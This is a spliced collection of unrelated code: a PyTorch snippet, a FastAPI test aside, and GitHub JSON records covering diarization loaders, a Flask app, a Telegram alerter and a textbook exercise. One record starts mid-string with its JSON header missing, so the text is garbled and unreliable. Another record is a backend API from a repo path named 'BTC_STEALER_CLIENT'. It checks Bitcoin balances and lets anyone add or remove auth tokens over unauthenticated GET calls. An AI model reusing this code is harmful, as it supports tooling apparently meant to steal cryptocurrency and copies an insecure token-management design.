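n = 5
A = torch.randn(n, n)
K = A @ A.T + 1e-1 * torch.eye(n)   # SPD toy "kernel" matrix
y = torch.randn(n, 1)

L = torch.linalg.cholesky(K)                   # K = L L^T
x = torch.cholesky_solve(y, L)                 # x = K^{-1} y
logdet = 2.0 * torch.log(torch.diag(L)).sum()  # log|K| from diag(L)

print(torch.allclose(K @ x, y, atol=1e-4), logdet)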
{"seq_id":"3013431024","text":"import sys\r\nimport re\r\nfrom time import sleep\r\nfrom bitcoin import *\r\ntry:  # Python 3\r\n    from urllib.request import urlopen\r\nexcept ImportError:  # Python 2\r\n    from urllib2 import urlopen\r\nfrom fastapi import FastAPI, Depends\r\nimport random\r\nfrom datetime import datetime\r\nimport json\r\nimport requests\r\n\r\n\r\ns = requests.Session()\r\n\r\napp = FastAPI()\r\n\r\n\r\ntimes = datetime.now()\r\ndt_string = times.strftime(\"%d/%m/%Y %H:%M:%S\")\r\n\r\n\r\n\r\nzero = \"[{}]\"  # the balance API returns [{}] for unknown/empty addresses\r\n\r\n\r\n\r\nclass status():\r\n    status: str\r\n\r\nwith open(\"status.json\", \"r\") as f:\r\n    current_status = json.load(f)['status']\r\n\r\n@app.get('/beta/status')\r\ndef get_status():\r\n    with open(\"status.json\", \"r\") as f:\r\n        current_status = json.load(f)['status']\r\n    return current_status\r\n\r\n@app.get(\"/version/{version}\")\r\ndef version(version: int):\r\n    return \"Check for Updates!\" if version < 2 else \"Latest Version Installed!\"\r\n\r\n\r\n@app.get('/beta/check/{address}')\r\ndef check_balance(address: str):\r\n    try:\r\n        wallet = s.get(f\"https://api-r.bitcoinchain.com/v1/address/{address}\", stream = True)\r\n        response = wallet.json()\r\n        # compare against the parsed empty-wallet sentinel, not the raw string\r\n        return 0 if response == json.loads(zero) else response\r\n    except:\r\n        return(\"Could not reach the server! The balance APIs are down!\")\r\n\r\n\r\n    \r\n@app.get('/auth/add/{token}')\r\ndef authadd(token: str):\r\n    with open('tokens.json', 'r') as f:\r\n        tokens = json.load(f)\r\n    tokens[str(f\"{token}\")] = f\"{token}\"\r\n    with open('tokens.json', 'w') as f:\r\n        json.dump(tokens, f)\r\n    return(\"Done!\")\r\n    \r\n@app.get('/auth/remove/{token}')\r\ndef removeauth(token: str):\r\n    with open('tokens.json', 'r') as f:\r\n        tokens = json.load(f)\r\n    tokens.pop(str(f\"{token}\"))\r\n    with open('tokens.json', 'w') as f:\r\n        json.dump(tokens, f)\r\n    return(\"Done!\")\r\n    \r\n@app.get('/auth/check/{token}')\r\ndef authcheck(token: str):\r\n    with open('tokens.json', 'r') as f:\r\n        tokens = json.load(f)\r\n    return token in tokens","repo_name":"LopeKinz/BTC_MULTI_","sub_path":"BTC_STEALER_CLIENT/API/API.py","file_name":"API.py","file_ext":"py","file_size_in_byte":1944,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"6"}
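Endpoints like the ones above are easy to poke with FastAPI's bundled test client; a minimal sketch against a fresh stand-in app (the real module reads status.json and tokens.json at import time, so it is not imported here):

from fastapi import FastAPI
from fastapi.testclient import TestClient

app = FastAPI()

@app.get("/version/{version}")
def version(version: int):
    # same logic as the record's /version endpoint
    return "Check for Updates!" if version < 2 else "Latest Version Installed!"

client = TestClient(app)
print(client.get("/version/1").json())  # "Check for Updates!"
print(client.get("/version/2").json())  # "Latest Version Installed!"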
Dendrogram\n    t0 = time.time()\n    sp.run([\"./hierarchical/getAverageLinkHCFromGraphFile\", affinities_graph_output, dendogram_output])\n    print(\"Dendrogram Delay: \", time.time()-t0, \"[s]\")\n    \n\n#%% Example Hierarchical Clustering\n\nprint(\"---Example Hierarchical Clustering---\")\n \ndir_raw_tractography=\"../data/118225_MNI_21p_sub.bundles\" # input format: \".bundles\" \n\nMatrixDist_output=\"../data/hierarch/matrixd.bin\" # output format: \".bin\" \n\naffinities_graph_output=\"../data/hierarch/affin.txt\"\n\nMaxDistance_Threshold=\"40\" # variable threshold \n\ndendogram_output=\"../data/hierarch/dendogram.txt\"\n\nt0= time.time()\n\nHierarchical(dir_raw_tractography,MatrixDist_output, affinities_graph_output,MaxDistance_Threshold,dendogram_output)\n\nprint(\"Hierarchical Delay: \", time.time()-t0, \"[s]\")\n\n#%% Function and Example Partitional Hierarchical Clustering\n\ndef Particional_Hierarchical(maxdist,var,arbfile,afffile,partfile):\n    \n    \"\"\"\n    Writes a \".txt\" file with the detected clusters, where each list is a cluster.\n    maxdist: 30 or 40 mm is recommended.\n    var = 3600: minimum affinity within a cluster => N.exp(-max_cldist * max_cldist / var)\n    \"\"\"\n    \n    wfv=CT.wforest_partition_maxdist_from_graph( arbfile,maxdist,True,afffile,var)\n    \n    clusteres=wfv.clusters\n    \n    ar=open(partfile,'wt')\n    ar.write(str(clusteres))\n    ar.close()\n\n\n# Example Partitional Hierarchical Clustering\nprint(\"---Example Partitional Hierarchical Clustering---\")\n\nmaxdist=30 \nvar = 3600 \narbfile=\"../data/hierarch/dendogram.txt\"\nafffile=\"../data/hierarch/affin.txt\"\npartfile=\"../data/hierarch/particion_\"+str(maxdist)+\".txt\"\n\nParticional_Hierarchical(maxdist,var,arbfile,afffile,partfile)\n\n#%% Function Retrieve clusters of fibers for Hierarchical clustering\n\ndef Write_Retrieve_clusters(d_result,wfv):\n\n    \"\"\"\n    Write one \".bundles\" file per detected cluster into the directory d_result.\n    \"\"\" \n    list_clusters=wfv.clusters\n    \n    raw_tractography = np.array(rb.read_bundle(dir_raw_tractography))\n    \n    for clus in range(len(list_clusters)):\n        if not os.path.exists(d_result+\"/\"):\n            os.mkdir(d_result+\"/\")\n        \n        rb.write_bundle(d_result+\"/\"+str(clus)+\".bundles\",raw_tractography[list_clusters[clus]])\n\n#%% Example Retrieve clusters of fibers for Hierarchical clustering\n    \nprint(\"---Example Retrieve clusters of fibers for Hierarchical clustering---\")    \n    \nd_result = \"../data/hierarch/result\"\nwfv=CT.wforest_partition_maxdist_from_graph( arbfile,maxdist,True,afffile,var)\nWrite_Retrieve_clusters(d_result,wfv)\n\n\n","repo_name":"GonzaloSabat/phybers","sub_path":"phybers/src/hclust/Clustering.py","file_name":"Clustering.py","file_ext":"py","file_size_in_byte":3392,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"}
{"seq_id":"4699523027","text":"import os\nimport numpy as np\nfrom functools import partial\nimport torch\nfrom eend.feature import get_input_dim\nfrom eend.pytorch_backend.models import fix_state_dict\nfrom eend.pytorch_backend.models import PadertorchModel\nfrom eend.pytorch_backend.models import TransformerDiarization\nfrom eend.pytorch_backend.transformer import NoamScheduler\nfrom eend.pytorch_backend.diarization_dataset \\\n    import DiarizationDatasetFromWave, DiarizationDatasetFromFeat\nimport padertorch as pt\nimport padertorch.train.optimizer as pt_opt\nfrom eend import feature\nfrom eend import kaldi_data\nimport yamlargparse\n\nparser = yamlargparse.ArgumentParser(description='training')\nparser.add_argument('-c', '--config', 
help='config file path',\n action=yamlargparse.ActionConfigFile)\nparser.add_argument('train_data_dir',\n help='kaldi-style data dir used for training.')\nparser.add_argument('valid_data_dir',\n help='kaldi-style data dir used for validation.')\nparser.add_argument('model_save_dir',\n help='output directory which model file will be saved in.')\nparser.add_argument('--initmodel', '-m', default='',\n help='Initialize the model from given file')\nparser.add_argument('--spkv-lab', default='',\n help='file path of speaker vector with label and\\\n speaker ID conversion table for adaptation')\n\n# The following arguments are set in conf/train.yaml or conf/adapt.yaml\nparser.add_argument('--spk-loss-ratio', default=0.03, type=float)\nparser.add_argument('--spkv-dim', default=256, type=int,\n help='dimension of speaker embedding vector')\nparser.add_argument('--max-epochs', default=100, type=int,\n help='Max. number of epochs to train')\nparser.add_argument('--input-transform', default='logmel23_mn',\n choices=['', 'log', 'logmel', 'logmel23', 'logmel23_mn',\n 'logmel23_mvn', 'logmel23_swn'],\n help='input transform')\nparser.add_argument('--lr', default=0.001, type=float)\nparser.add_argument('--optimizer', default='noam', type=str)\nparser.add_argument('--num-speakers', default=3, type=int)\nparser.add_argument('--gradclip', default=5, type=int,\n help='gradient clipping. if < 0, no clipping')\nparser.add_argument('--chunk-size', default=150, type=int,\n help='number of frames in one utterance')\nparser.add_argument('--batchsize', default=64, type=int,\n help='number of utterances in one batch.\\\n Note that real batchsize = number of gpu *\\\n batchsize-per-gpu * batchsize')\nparser.add_argument('--num-workers', default=8, type=int)\nparser.add_argument('--hidden-size', default=256, type=int)\nparser.add_argument('--context-size', default=7, type=int)\nparser.add_argument('--subsampling', default=10, type=int)\nparser.add_argument('--frame-size', default=200, type=int)\nparser.add_argument('--frame-shift', default=80, type=int)\nparser.add_argument('--sampling-rate', default=8000, type=int)\nparser.add_argument('--noam-scale', default=1.0, type=float)\nparser.add_argument('--noam-warmup-steps', default=25000, type=float)\nparser.add_argument('--transformer-encoder-n-heads', default=8, type=int)\nparser.add_argument('--transformer-encoder-n-layers', default=6, type=int)\nparser.add_argument('--transformer-encoder-dropout', default=0.1, type=float)\nparser.add_argument('--seed', default=777, type=int)\nparser.add_argument('--feature-nj', default=100, type=int,\n help='maximum number of subdirectories to store\\\n featlab_XXXXXXXX.npy')\nparser.add_argument('--batchsize-per-gpu', default=16, type=int,\n help='virtual_minibatch_size in padertorch')\nparser.add_argument('--test-run', default=0, type=int, choices=[0, 1],\n help='padertorch test run switch; 1 is on, 0 is off')\n\nargs = parser.parse_args()\nprint(args)\n\ndef _count_frames(data_len, size, step):\n return int((data_len - size + step) / step)\n\n\ndef _gen_frame_indices(data_length, size=2000, step=2000):\n i = -1\n for i in range(_count_frames(data_length, size, step)):\n yield i * step, i * step + size\n\n if i * step + size < data_length:\n if data_length - (i + 1) * step > 0:\n if i == -1:\n yield (i + 1) * step, data_length\n else:\n yield data_length - size, data_length\n\nclass DiarizationDatasetFromWaveTest(torch.utils.data.Dataset):\n def __init__(\n self,\n data_dir,\n dtype=np.float32,\n chunk_size=2000,\n context_size=0,\n 
frame_size=1024,\n frame_shift=256,\n subsampling=1,\n rate=16000,\n input_transform=None,\n n_speakers=None,\n ):\n self.data_dir = data_dir\n self.dtype = dtype\n self.chunk_size = chunk_size\n self.context_size = context_size\n self.frame_size = frame_size\n self.frame_shift = frame_shift\n self.subsampling = subsampling\n self.rate = rate\n self.input_transform = input_transform\n self.n_speakers = n_speakers\n\n self.chunk_indices = []\n self.data = kaldi_data.KaldiData(self.data_dir)\n self.all_speakers = sorted(self.data.spk2utt.keys())\n self.all_n_speakers = len(self.all_speakers)\n self.all_n_speakers_arr =\\\n np.arange(self.all_n_speakers,\n dtype=np.int64).reshape(self.all_n_speakers, 1)\n\n # Make chunk indices: filepath, start_frame, end_frame\n # for rec in self.data.wavs:\n # data_len = int(self.data.reco2dur[rec] * self.rate / frame_shift)\n # data_len = int(data_len / self.subsampling)\n # for st, ed in _gen_frame_indices(data_len, chunk_size, chunk_size):\n # self.chunk_indices.append(\n # (rec, st * self.subsampling, ed * self.subsampling))\n for i,rec in enumerate(self.data.wavs):\n self.chunk_indices.append([])\n data_len = int(self.data.reco2dur[rec] * self.rate / frame_shift)\n data_len = int(data_len / self.subsampling)\n for st, ed in _gen_frame_indices(data_len, chunk_size, chunk_size):\n self.chunk_indices[i].append(\n (rec, st * self.subsampling, ed * self.subsampling)\n )\n print(len(self.chunk_indices), \" chunks\")\n\n def __len__(self):\n return len(self.chunk_indices)\n\n def __getitem__(self, i):\n # rec, st, ed = self.chunk_indices[i]\n # filtered_segments = self.data.segments[rec]\n # # speakers: the value given from data\n # speakers = np.unique(\n # [self.data.utt2spk[seg['utt']] for seg in filtered_segments]\n # ).tolist()\n # n_speakers = self.n_speakers\n # if self.n_speakers < len(speakers):\n # n_speakers = len(speakers)\n\n # Y, T = feature.get_labeledSTFT(\n # self.data,\n # rec,\n # st,\n # ed,\n # self.frame_size,\n # self.frame_shift,\n # n_speakers,\n # )\n # T = T.astype(np.float32)\n\n # S_arr = -1 * np.ones(n_speakers).astype(np.int64)\n # for seg in filtered_segments:\n # speaker_index = speakers.index(self.data.utt2spk[seg['utt']])\n # all_speaker_index = self.all_speakers.index(\n # self.data.utt2spk[seg['utt']])\n # S_arr[speaker_index] = all_speaker_index\n\n # # If T[:, n_speakers - 1] == 0.0, then S_arr[n_speakers - 1] == -1,\n # # so S_arr[n_speakers - 1] is not used for training,\n # # e.g., in the case of training 3-spk model with 2-spk data\n\n # Y = feature.transform(Y, self.input_transform)\n # Y_spliced = feature.splice(Y, self.context_size)\n # Y_ss, T_ss = feature.subsample(Y_spliced, T, self.subsampling)\n # ilen = np.array(Y_ss.shape[0], dtype=np.int64)\n\n # return Y_ss, T_ss, S_arr, self.all_n_speakers_arr, ilen\n rec_list = self.chunk_indices[i]\n wav_data_list = []\n\n for rec, st, ed in rec_list:\n filtered_segments = self.data.segments[rec]\n # speakers: the value given from data\n speakers = np.unique(\n [self.data.utt2spk[seg['utt']] for seg in filtered_segments]\n ).tolist()\n n_speakers = self.n_speakers\n if self.n_speakers < len(speakers):\n n_speakers = len(speakers)\n\n Y, T = feature.get_labeledSTFT(\n self.data,\n rec,\n st,\n ed,\n self.frame_size,\n self.frame_shift,\n n_speakers,\n )\n T = T.astype(np.float32)\n\n S_arr = -1 * np.ones(n_speakers).astype(np.int64)\n for seg in filtered_segments:\n speaker_index = speakers.index(self.data.utt2spk[seg['utt']])\n all_speaker_index = 
self.all_speakers.index(\n self.data.utt2spk[seg['utt']])\n S_arr[speaker_index] = all_speaker_index\n\n # If T[:, n_speakers - 1] == 0.0, then S_arr[n_speakers - 1] == -1,\n # so S_arr[n_speakers - 1] is not used for training,\n # e.g., in the case of training 3-spk model with 2-spk data\n\n Y = feature.transform(Y, self.input_transform)\n Y_spliced = feature.splice(Y, self.context_size)\n Y_ss, T_ss = feature.subsample(Y_spliced, T, self.subsampling)\n ilen = np.array(Y_ss.shape[0], dtype=np.int64)\n wav_data = {}\n wav_data['xs'] = Y_ss\n wav_data['ts'] = T_ss\n wav_data['ss'] = S_arr\n wav_data['ns'] = self.all_n_speakers_arr\n wav_data['ilens'] = ilen\n wav_data['rec'] = rec\n wav_data_list.append(wav_data)\n\n return wav_data_list\n\n def get_allnspk(self):\n return self.all_n_speakers\n\ndef collate_fn_ns(batch, n_speakers, spkidx_tbl):\n xs, ts, ss, ns, ilens = list(zip(*batch)) # feature, activity, speaker ID, speaker number, chunksize\n valid_chunk_indices1 = [i for i in range(len(ts))\n if ts[i].shape[1] == n_speakers] # 3 == n_speakers\n valid_chunk_indices2 = []\n\n # n_speakers (rec-data) > n_speakers (model)\n invalid_chunk_indices1 = [i for i in range(len(ts))\n if ts[i].shape[1] > n_speakers]\n\n ts = list(ts)\n ss = list(ss)\n for i in invalid_chunk_indices1:\n s = np.sum(ts[i], axis=0)\n cs = ts[i].shape[0]\n if len(s[s > 0.5]) <= n_speakers:\n # n_speakers (chunk-data) <= n_speakers (model)\n # update valid_chunk_indices2\n valid_chunk_indices2.append(i)\n idx_arr = np.where(s > 0.5)[0]\n ts[i] = ts[i][:, idx_arr]\n ss[i] = ss[i][idx_arr]\n if len(s[s > 0.5]) < n_speakers:\n # n_speakers (chunk-data) < n_speakers (model)\n # update ts[i] and ss[i]\n n_speakers_real = len(s[s > 0.5])\n zeros_ts = np.zeros((cs, n_speakers), dtype=np.float32)\n zeros_ts[:, :-(n_speakers-n_speakers_real)] = ts[i]\n ts[i] = zeros_ts\n mones_ss = -1 * np.ones((n_speakers,), dtype=np.int64)\n mones_ss[:-(n_speakers-n_speakers_real)] = ss[i]\n ss[i] = mones_ss\n else:\n # n_speakers (chunk-data) == n_speakers (model)\n pass\n else:\n # n_speakers (chunk-data) > n_speakers (model)\n pass\n\n # valid_chunk_indices: chunk indices using for training\n valid_chunk_indices = sorted(valid_chunk_indices1 + valid_chunk_indices2)\n\n ilens = np.array(ilens)\n ilens = ilens[valid_chunk_indices]\n ns = np.array(ns)[valid_chunk_indices]\n ss = np.array([ss[i] for i in range(len(ss))\n if ts[i].shape[1] == n_speakers])\n xs = [xs[i] for i in range(len(xs)) if ts[i].shape[1] == n_speakers]\n ts = [ts[i] for i in range(len(ts)) if ts[i].shape[1] == n_speakers]\n xs = np.array([np.pad(x, [(0, np.max(ilens) - len(x)), (0, 0)],\n 'constant', constant_values=(-1,)) for x in xs])\n ts = np.array([np.pad(t, [(0, np.max(ilens) - len(t)), (0, 0)],\n 'constant', constant_values=(+1,)) for t in ts])\n\n if spkidx_tbl is not None:\n # Update global speaker ID\n all_n_speakers = np.max(spkidx_tbl) + 1\n bs = len(ns)\n ns = np.array([\n np.arange(\n all_n_speakers,\n dtype=np.int64\n ).reshape(all_n_speakers, 1)] * bs)\n ss = np.array([spkidx_tbl[ss[i]] for i in range(len(ss))])\n\n return (xs, ts, ss, ns, ilens)\n\n\ndef collate_fn(batch):\n xs, ts, ss, ns, ilens = list(zip(*batch))\n ilens = np.array(ilens)\n xs = np.array([np.pad(\n x, [(0, np.max(ilens) - len(x)), (0, 0)],\n 'constant', constant_values=(-1,)\n ) for x in xs])\n ts = np.array([np.pad(\n t, [(0, np.max(ilens) - len(t)), (0, 0)],\n 'constant', constant_values=(+1,)\n ) for t in ts])\n ss = np.array(ss)\n ns = np.array(ns)\n\n return (xs, ts, ss, ns, 
ilens)\n\ndef save_feature(args):\n # Set seed for reproducibility\n np.random.seed(args.seed)\n torch.manual_seed(args.seed)\n torch.backends.cudnn.deterministic = True\n os.environ['PYTORCH_SEED'] = str(args.seed)\n torch.backends.cudnn.benchmark = False\n\n # device = [device_id for device_id in range(torch.cuda.device_count())]\n device = [1]\n print('GPU device {} is used'.format(device))\n\n train_set = DiarizationDatasetFromWave(\n args.train_data_dir,\n chunk_size=args.chunk_size,\n context_size=args.context_size,\n input_transform=args.input_transform,\n frame_size=args.frame_size,\n frame_shift=args.frame_shift,\n subsampling=args.subsampling,\n rate=args.sampling_rate,\n n_speakers=args.num_speakers,\n )\n\n # Count n_chunks\n batchsize = args.batchsize * len(device) * \\\n args.batchsize_per_gpu\n f = open('{}/batchsize.txt'.format(args.model_save_dir), 'w')\n f.write(\"{}\\n\".format(batchsize))\n f.close()\n trainloader = torch.utils.data.DataLoader(\n train_set, batch_size=batchsize,\n shuffle=False, num_workers=args.num_workers,\n collate_fn=partial(\n collate_fn_ns,\n n_speakers=args.num_speakers,\n spkidx_tbl=None)\n )\n n_chunks = len(trainloader)\n print(\"n_chunks : {}\".format(n_chunks))\n os.makedirs(\"{}/data/\".format(args.model_save_dir), exist_ok=True)\n f = open('{}/data/n_chunks.txt'.format(args.model_save_dir), 'w')\n f.write(\"{}\\n\".format(n_chunks))\n f.close()\n\n if n_chunks % args.feature_nj == 0:\n max_num_per_dir = n_chunks // args.feature_nj\n else:\n max_num_per_dir = n_chunks // args.feature_nj + 1\n print(\"max_num_per_dir : {}\".format(max_num_per_dir))\n\n # Save featlab_XXXXXXXX.npy and featlab_chunk_indices.txt\n spkidx_tbl = None\n if args.initmodel:\n # adaptation\n npz = np.load(args.spkv_lab)\n spkidx_tbl = npz['arr_2']\n\n trainloader = torch.utils.data.DataLoader(\n train_set, batch_size=batchsize,\n shuffle=False, num_workers=args.num_workers,\n collate_fn=partial(\n collate_fn_ns,\n n_speakers=args.num_speakers,\n spkidx_tbl=spkidx_tbl)\n )\n f = open('{}/data/featlab_chunk_indices.txt'.\n format(args.model_save_dir), 'w')\n idx = 0\n digit_num = len(str(args.feature_nj-1))\n fmt = \"{}/data/{:0={}}/featlab_{:0=8}.npy\"\n for data in trainloader:\n dir_num = idx // max_num_per_dir\n os.makedirs(\"{}/data/{:0={}}/\".\n format(args.model_save_dir, dir_num, digit_num),\n exist_ok=True)\n output_npy_path = fmt.format(args.model_save_dir,\n dir_num, digit_num, idx)\n print(output_npy_path)\n bs = data[0].shape[0] #batch size\n cs = data[0].shape[1] #chunk size\n # data0 (feature)\n data0 = data[0]\n # data1 (reference speech activity)\n data1 = data[1]\n # data2 (reference speaker ID)\n data2 = np.zeros([bs, cs, data[2].shape[1]], dtype=np.float32)\n for j in range(bs):\n data2[j, :, :] = data[2][j, :]\n # data3 (reference number of all speakers)\n data3 = np.ones([bs, cs, 1], dtype=np.float32) * len(data[3][0])\n # data4 (real chunk size)\n data4 = np.zeros([bs, cs, 1], dtype=np.float32)\n for j in range(bs):\n data4[j, :, :] = data[4][j]\n save_data = np.concatenate((data0,\n data1,\n data2,\n data3,\n data4), axis=2)\n\n np.save(output_npy_path, save_data)\n for j in range(save_data.shape[0]):\n f.write(\"{} {}\\n\".format(output_npy_path, j))\n idx += 1\n f.close()\n\n # Create completion flag\n f = open('{}/data/.done'.format(args.model_save_dir), 'w')\n f.write(\"\")\n f.close()\n print('Finished!')\n\n\ndef collate_fn_test(batch, n_speakers, spkidx_tbl):\n data_list = list(*batch)\n ms = len(batch)\n bs = len(data_list)\n cs = None\n 
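# Hedged sanity check (my addition, not the original author's): every\n    # chunk dict produced by DiarizationDatasetFromWaveTest.__getitem__ above\n    # carries exactly these keys before being packed below, so fail fast\n    # if one is malformed.\n    expected_keys = {'xs', 'ts', 'ss', 'ns', 'ilens', 'rec'}\n    assert all(expected_keys <= set(d) for d in data_list), 'malformed chunk dict'\n    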
new_data = None\n    for data in data_list:\n        xs = data['xs']\n        ts = data['ts']\n        ss = data['ss']\n        ns = data['ns']\n        ilens = data['ilens']\n        \n\n        xs = np.array([np.pad(xs, [(0, np.max(ilens) - len(xs)), (0, 0)],\n                    'constant', constant_values=(-1,))])\n        ts = np.array([np.pad(ts, [(0, np.max(ilens) - len(ts)), (0, 0)],\n                    'constant', constant_values=(+1,))])\n\n\n        # both branches build the same (1, cs, D) blocks; the else-branch\n        # additionally appends along the batch axis\n        if cs is None:\n            cs = ts.shape[1]\n            data0 = xs\n            data1 = ts\n            data2 = np.zeros([1,cs, ts.shape[2]], dtype=np.float32)\n            for j in range(cs):\n                data2[0, j, :] = ss[:]\n            data3 = np.ones([1, cs, 1], dtype=np.float32) * len(ns)\n            data4 = np.zeros([1, cs, 1], dtype=np.float32)\n            for j in range(cs):\n                data4[0, j, :] = ilens\n\n            new_data = np.concatenate((data0,\n                                    data1,\n                                    data2,\n                                    data3,\n                                    data4), axis=2)\n        else:\n            cs = ts.shape[1]\n            data0 = xs\n            data1 = ts\n            data2 = np.zeros([1,cs, ts.shape[2]], dtype=np.float32)\n            for j in range(cs):\n                data2[0, j, :] = ss[:]\n            data3 = np.ones([1, cs, 1], dtype=np.float32) * len(ns)\n            data4 = np.zeros([1, cs, 1], dtype=np.float32)\n            for j in range(cs):\n                data4[0, j, :] = ilens\n\n            tmp_data = np.concatenate((data0,\n                                    data1,\n                                    data2,\n                                    data3,\n                                    data4), axis=2)\n            new_data = np.concatenate((new_data, tmp_data), axis=0)\n        \n    return new_data\n\ndataset = DiarizationDatasetFromWaveTest(\n    args.train_data_dir,\n    chunk_size=args.chunk_size,\n    context_size=args.context_size,\n    input_transform=args.input_transform,\n    frame_size=args.frame_size,\n    frame_shift=args.frame_shift,\n    subsampling=args.subsampling,\n    rate=args.sampling_rate,\n    n_speakers=args.num_speakers,\n)\n\n\n\ndataloader = torch.utils.data.DataLoader(\n    dataset, batch_size=1,\n    shuffle=True, num_workers=args.num_workers,\n    collate_fn=partial(\n        collate_fn_test,\n        n_speakers=args.num_speakers,\n        spkidx_tbl=None)\n)\n\nfor data in dataloader:\n    tmp = data\n","repo_name":"biubiugun/EEND-VC","sub_path":"eend/pytorch_backend/loader_test.py","file_name":"loader_test.py","file_ext":"py","file_size_in_byte":20273,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"}
{"seq_id":"70042645308","text":"# Module for broadcasting an alert through my Telegram bot (Bot API) when one of the APIs goes down\nimport settings as s\nimport requests\nfrom datetime import datetime\n\n\ndef send_bot_alert(host, message):\n    print('start send by bot_api ....')\n    # get the current date and time\n    datetime_str = str(datetime.now())\n\n    # data = {\"chat_id_list\": [\"322734040\", \"72205748\"],\n    # NOTE: the Russian payload keys below are the receiving service's protocol\n    # and are left as-is (\"Номер телефона\" = phone number, \"Результаты опроса\" =\n    # survey results, \"Домен\" = domain, \"Время\" = time)\n    data = {\"chat_id_list\": [\"322734040\"],\n            \"message\": {\n                \"quiz\": \"=========ALERT!===========\",\n                \"Номер телефона\": \"Dentolo check API service\",\n                \"Результаты опроса\": f\"Attention, colleagues!! Our API {s.tmp_endpoint} is not responding / is down!!\",\n                \"service\": \"Dentolo check API service\",\n                \"href\": f\"{s.tmp_endpoint}\",\n                \"Домен\": f\"{s.tmp_endpoint}\",\n                \"Время\": f\"{datetime_str}\",\n                },\n            }\n\n    req = requests.post(url=s.bot_api_endpoint, headers=s.bot_api_header, json=data)\n    print(req.status_code)\n","repo_name":"homebrewdev/API_ping","sub_path":"send2_telegram_bot.py","file_name":"send2_telegram_bot.py","file_ext":"py","file_size_in_byte":1142,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"}
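For reference, the same alert can be sent straight through Telegram's official Bot API instead of a relay service; a minimal sketch with placeholder credentials (TOKEN and CHAT_ID are hypothetical):

import requests

# Direct Telegram Bot API equivalent of the relay call above.
TOKEN = "123456:ABC-DEF"   # hypothetical bot token
CHAT_ID = "322734040"
text = "ALERT: API is not responding"

resp = requests.post(
    f"https://api.telegram.org/bot{TOKEN}/sendMessage",
    json={"chat_id": CHAT_ID, "text": text},
    timeout=10,
)
print(resp.status_code, resp.json().get("ok"))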
{"seq_id":"33561399091","text":"from flask import Blueprint, render_template, url_for, redirect, request\nfrom .__init__ import db, Info\nimport requests\n\npages = Blueprint('pages', __name__)\n\n\n@pages.route('/')\ndef principal():\n    return render_template('principal.html')\n\n\n@pages.route('/', methods = ['GET', 'POST'])\ndef principal_input():\n    # save the submitted form values in variables\n    user_name = request.form.get('user_name')\n    user_age = request.form.get('user_age')\n    user_fare = request.form.get('user_fare')\n    user_sex = request.form.get('user_sex')\n    user_pclass = request.form.get('user_pclass')\n    user_parch = request.form.get('user_parch')\n    user_sibsp = request.form.get('user_sibsp')\n\n    # map the form values to the API's expected keys\n    user_data = {'Age': user_age, 'Pclass': user_pclass,\n                'Sex': user_sex, 'Fare': user_fare,\n                'Parch': user_parch, 'SibSp': user_sibsp}\n\n    # call the prediction API\n    api_response = requests.get('http://127.0.0.1:5000/API/', user_data)\n    json_response = api_response.json()\n    text = json_response['Prediction']\n    prob = json_response['Probability of survive']\n\n    # save the API data in the table\n    user = Info(name = user_name, text = text, prob=prob)\n    db.session.add(user)\n    db.session.commit()\n\n    if prob >= 50:\n        return redirect(url_for('pages.alive'))\n\n    return redirect(url_for('pages.dead'))\n\n\n@pages.route('/dead')\ndef dead():\n    # this query fetches the most recent row in the table\n    user = Info.query.order_by(Info.id.desc()).first()\n    return render_template('dead.html', user= user)\n\n@pages.route('/alive')\ndef alive():\n    user = Info.query.order_by(Info.id.desc()).first()\n    return render_template('alive.html', user=user)\n","repo_name":"Breno-Valle/titanic_website","sub_path":"ML_API/pages.py","file_name":"pages.py","file_ext":"py","file_size_in_byte":1725,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"}
{"seq_id":"73605302","text":"# In our implementation of the scale function (page 25) the body of the loop executes the command data[j] *= factor. We have discussed that numeric types are immutable, and that use of the *= operator in this context causes the creation of a new instance (not the mutation of an existing instance). How is it still possible, then, that our implementation of scale changes the actual parameter sent by the caller?\r\n\r\ndef scale(data, factor):\r\n    # rebinds the loop variable only; the caller's list is never mutated\r\n    for i in data:\r\n        i *= factor\r\n    return data\r\n    \r\n\r\n\r\n\r\n#print(\"Bad scaling\")\r\n#data = [1, 2, 4]; print(data)\r\n#scale(data, 4); print(data)\r\n\r\ndef realscale(data, factor):\r\n    # index assignment mutates the list object the caller passed in\r\n    for i in range(len(data)):\r\n        data[i] *= factor\r\n    return data\r\n\r\n\r\n\r\nv = realscale([1,2,4,5,6,7,8,9,1,2,22,33,44,54], 55)\r\nprint(v)","repo_name":"archimedessena/algo-in-python","sub_path":"chapter1/ex16.py","file_name":"ex16.py","file_ext":"py","file_size_in_byte":770,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"}
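The exercise above turns on rebinding versus in-place item assignment; a short demonstration (mine, not part of the record):

data = [1, 2, 4]

# Rebinding: `i *= factor` makes i point at a new int; the list is untouched.
for i in data:
    i *= 2
print(data)  # [1, 2, 4]

# Item assignment: data[j] = <new int> mutates the (mutable) list itself,
# even though each int object is immutable.
for j in range(len(data)):
    data[j] *= 2
print(data)  # [2, 4, 8]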